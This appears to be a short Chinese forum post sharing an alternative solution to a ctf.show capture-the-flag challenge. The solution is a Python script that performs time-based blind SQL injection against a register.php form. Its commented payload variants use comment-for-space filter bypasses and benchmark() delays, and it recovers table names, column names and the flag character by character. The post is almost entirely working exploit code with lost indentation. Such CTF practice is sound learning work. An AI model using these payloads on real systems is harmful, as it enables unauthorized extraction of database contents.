借楼交流一下另一种解法
import requests
import time
i=1
n=2
flag=""
for i in range(42,44):
print(i)
m=64
j=64
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
data={"e":"cop\x40qq.com",
"u":exp,
"p":"123456"
}
url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
startTime=time.time()
p=requests.post(url,data=data,timeout=100)
#print(p.status_code)
print(m)
#print(exp)
#print(time.time()-startTime)
if time.time()-startTime<2:
n=1
else:
n=0
if q==7:
if time.time()-startTime<2:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)